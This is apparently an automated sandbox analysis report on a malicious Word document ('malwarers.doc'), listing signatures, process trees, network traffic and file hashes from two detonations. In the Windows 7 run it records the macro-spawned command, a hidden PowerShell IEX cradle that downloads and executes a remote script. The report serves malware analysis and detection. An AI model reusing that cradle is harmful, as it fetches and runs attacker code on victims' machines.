Analysis Overview
SHA256
1c8d2db41d2ffc6da5c52a203ec8be94253c35b27e073447889c8af3cfa1be4f
Threat Level: Known bad
The file malwarers.doc was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Office macro that triggers on suspicious action
Suspicious Office macro
Command and Scripting Interpreter: PowerShell
Drops file in Windows directory
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 07:40
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 07:40
Reported
2024-08-06 07:42
Platform
win7-20240708-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\malwarers.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe –WindowStyle Hidden IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.246/1234567892222.ps1')
Network
| Country | Destination | Domain | Proto |
| N/A | 192.168.1.246:80 | tcp |
Files
memory/2972-0-0x000000002F4F1000-0x000000002F4F2000-memory.dmp
memory/2972-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2972-2-0x000000007131D000-0x0000000071328000-memory.dmp
memory/2972-8-0x0000000004D80000-0x0000000004E80000-memory.dmp
memory/2972-13-0x0000000000450000-0x0000000000550000-memory.dmp
memory/2972-15-0x0000000004D80000-0x0000000004E80000-memory.dmp
memory/2972-14-0x0000000004D80000-0x0000000004E80000-memory.dmp
memory/2972-18-0x000000007131D000-0x0000000071328000-memory.dmp
memory/2972-19-0x0000000004D80000-0x0000000004E80000-memory.dmp
memory/2972-21-0x0000000000450000-0x0000000000550000-memory.dmp
memory/2972-22-0x0000000000450000-0x0000000000550000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 5bee31d15c6798f4c4bfbc5a4ef5b0d0 |
| SHA1 | 668b03bb264b53f1f5823e7ead171e3bb2401a4b |
| SHA256 | 221e7e293a207ff04e68cac0771533f8adebd3f0937ae08cdb808c9632d765f6 |
| SHA512 | a727c46a2c396b1e9b97a284ca2645819bc319d7eafda82cf3f412170d5674325d793cb3816a86945fef009f811f501b58725e7429e5bf596e74084b585492c1 |
memory/2972-37-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2972-39-0x0000000000450000-0x0000000000550000-memory.dmp
memory/2972-38-0x000000007131D000-0x0000000071328000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-06 07:40
Reported
2024-08-06 07:42
Platform
win10v2004-20240802-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\malwarers.doc" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 2.17.209.123:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 123.209.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.252.19.2.in-addr.arpa | udp |
Files
memory/2360-0-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp
memory/2360-2-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp
memory/2360-1-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp
memory/2360-4-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp
memory/2360-3-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp
memory/2360-5-0x00007FF965ECD000-0x00007FF965ECE000-memory.dmp
memory/2360-9-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-11-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-13-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-12-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-14-0x00007FF923750000-0x00007FF923760000-memory.dmp
memory/2360-15-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-10-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-8-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-7-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-6-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-20-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-22-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-21-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-19-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-18-0x00007FF923750000-0x00007FF923760000-memory.dmp
memory/2360-17-0x00007FF965E30000-0x00007FF966025000-memory.dmp
memory/2360-16-0x00007FF965E30000-0x00007FF966025000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 3df0e89b413fe2ff36c8610f7493536f |
| SHA1 | 68315e1f8e1e0cfe67581106ebffbd87ac278b52 |
| SHA256 | 75eeea8e4d37197d179809004fed94cdd6eae1b32ce794853fe8e7da42c2cf85 |
| SHA512 | 9df311530c7ec4f62adbd7b60d51a683aa84adcc49136b3e0765c215666dc95e325b8affc34be6cc31703a81ffc66a1e3025fed137264d6f87dcd65e267c0a1e |
memory/2360-42-0x00007FF965E30000-0x00007FF966025000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl
| MD5 | ff0e07eff1333cdf9fc2523d323dd654 |
| SHA1 | 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4 |
| SHA256 | 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5 |
| SHA512 | b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d |
memory/2360-215-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp
memory/2360-218-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp
memory/2360-216-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp
memory/2360-217-0x00007FF925EB0000-0x00007FF925EC0000-memory.dmp
memory/2360-219-0x00007FF965E30000-0x00007FF966025000-memory.dmp